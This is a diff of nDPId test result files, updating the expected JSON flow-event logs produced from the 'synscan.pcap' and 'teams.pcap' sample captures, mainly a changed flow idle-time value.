+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":326,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3369,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3370,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1845,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15660,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"PostgreSQL","breed":"Acceptable","category":"Database"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":2011,"packets-processed":2011,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":1876,"total-guessed-flows":116,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1994,"total-idle-flows":1994,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7990,"global_ts_msec":1278275079360} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2011/2011 diff --git a/test/results/teams.pcap.out b/test/results/teams.pcap.out index 731a900e3..f39472e52 100644 --- a/test/results/teams.pcap.out +++ b/test/results/teams.pcap.out @@ -5,15 +5,15 @@ 00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041672419,"flow_last_seen":1587041672419,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":279,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041672419,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"tl-sg116e","fingerprint":"1,3","class_ident":"TL-SG116E"}} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041672611} 00344{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041672419,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1587041673094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041673094,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPCDAqAEGlZqnW+SlAbsZTPC7DAoX94ARECZ4MwAAAQEICjCEirAtAPMf"} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041673094,"flow_last_seen":1587041673094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1587041673094,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 